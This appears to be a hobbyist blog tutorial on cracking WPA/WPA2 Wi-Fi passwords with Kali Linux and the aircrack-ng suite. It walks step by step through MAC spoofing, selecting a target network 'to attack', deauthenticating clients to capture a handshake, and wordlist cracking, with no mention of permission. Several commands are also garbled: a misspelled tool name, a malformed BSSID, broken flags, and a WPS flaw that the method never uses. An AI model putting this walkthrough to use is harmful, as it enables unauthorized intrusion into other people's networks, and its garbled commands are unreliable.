Hello Friends, I got many response on to Wi-Fi Hacking, I already discussed about WEP. But Now-a-days many people are using WPA/WPA2 Security Protocol. Wi-Fi Protected Access (WPA/WPA2) are mainly developed in response to serious weaknesses and loopholes in the previous system (WEP).
WPA/WPA2 also have a flaw in its feature add to Wi-Fi called Wi-Fi Protected Setup (WPS) which allows WPA/WPA2 security can be bypassed and cracked in many situation. Many Access Point they have a WPS.
Here, we are going to use Kali Linux, which the pre build OS for HACKERS. It have the all required tools. Firstly, Backtrack is used, now-a-days it is not published. So, here i used Kali Linux. Go To its Homepage and Download Latest Version.
REQUIRED:
Little Knowledge in Kali-Linux, and on commands of Aircrack-ng, If it is the First time that you are learning Wi-Fi hacking, then i recommend you to have a Look on this WEP HACKING By which you will understand the commands, and you can understand more Faster.
So, Let's Begin the Hacking:
1} Open New Terminal, and bring up a list of wireless network interfaces.
aircrak-ng
2} Under the interface column, select one of your interfaces. In this case, we will use wlan0. If you have a different interface, such as mon0, please substitute it at every location where wlan0 is mentioned.3} Next, we need to stop the wlan0 interface and take it down.
airmon-ng stop wlan0
ifconfig wlan0 down
4} Next, we need to change the MAC address of our interface. In this case, we will use 10:20:30:40:50:60 macchanger -–mac 10:20:30:40:50:60 wlan0
5} Now we need to restart airmon-ng airmon-ng start wlan0
6} Next, we will use airodump to locate the available wireless networks nearby. airodump-ng wlan0
7} A listing of available networks will begin to appear. Once you find the one you want to attack, press Ctrl + C to stop the search. Highlight the MAC address in the BSSID column, right-click, and select copy. Also, make note of the channel that the network is transmitting its signal upon. You will find this information in the Channel column. In this case, the channel is 10.
8} Now we run airodump and copy the information for the selected BSSID to a file. We will utilize the following options:
–c allows us to select our channel. In this case, we use 10.
–w allows us to select the name of our file. In this case, we have chosen wirelessattack.
–bssid allows us to select our BSSID. In this case, we will paste 09:AC:90:AB:78 from the clipboard.
airodump-ng –c 10 –w wirelessattack --bssid 09:AC:90:AB:78 wlan0
9} A new terminal window will open displaying the output from the previous command. Leave this window open.10} Open another terminal window; to attempt to make an association, we will run aireplay, which has the following syntax: aireplay-ng –dauth 1 –a [BSSID] –c [our chosen MAC address] [Interface]. This process may take a few moments.
Aireplay-ng --deauth 1 –a 09:AC:90:AB:78 –c 10:20:30:40:50:60 wlan0
11} Finally, we run AirCrack to crack the WPA key. The –w option allows us to specify the location of our wordlist. We will use the .cap file that we named earlier. In this case, the file's name is wirelessattack.cap. Aircrack-ng –w ./wordlist.lst wirelessattack.cap
That's It: We make It if your Wordlist has the correct keyword then it will shown on the Terminal. Time Depends on your PC speed, also on Number of Password in text file.
Any Doubt Ask me or Contact me....... Like My Page for recent updates, and Follow me on Facebook, Twitter, Google+
0 comments: